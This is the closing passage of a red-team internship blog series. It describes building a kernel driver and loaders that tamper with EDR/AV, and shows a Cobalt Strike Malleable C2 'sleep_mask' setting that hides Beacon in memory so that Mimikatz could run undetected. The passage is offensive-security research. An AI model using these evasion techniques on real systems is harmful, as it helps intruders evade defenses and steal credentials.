Last but not least, I incorporated the Sleep_Mask directive in my Cobalt Strike Malleable C2 profile. This tells Cobalt Strike to obfuscate Beacon in memory before it goes to sleep by means of an XOR encryption routine.
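
For reference, this is a single global option in the profile (a minimal sketch; the rest of the profile is omitted):

set sleep_mask "true";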

The loader was able to execute Beacon undetected and with the help of my kernel driver running Mimikatz was but a click of the button.

On that bombshell, it’s time to end this internship and I think I can conclude that while having a kernel driver to tamper with EDR/AV is certainly useful, a majority of the detection mechanisms are still present in user land or are driven by signatures and rules for static detection.

6. Conclusion

During this Kernel Karnage series, I developed a kernel driver from scratch, accompanied by several different loaders, with the goal to effectively tamper with EDR/AV solutions to allow execution of common known tools which would otherwise be detected immediately. While there certainly are several factors limiting the deployment and application of a kernel driver (such as DSE, HVCI, Secure Boot), it turns out to be quite powerful in combination with user land evasion techniques and manages to address the AI/ML component of EDR/AV which would otherwise require a great deal of obfuscation and anti-sandboxing.

About the author

Sander is a junior consultant and part of NVISO’s red team. He has a passion for malware development and enjoys any low-level programming or stumbling through a debugger. When Sander is not lost in 1s and 0s, you can find him traveling around Europe and Asia. You can reach Sander on LinkedIn or Twitter.
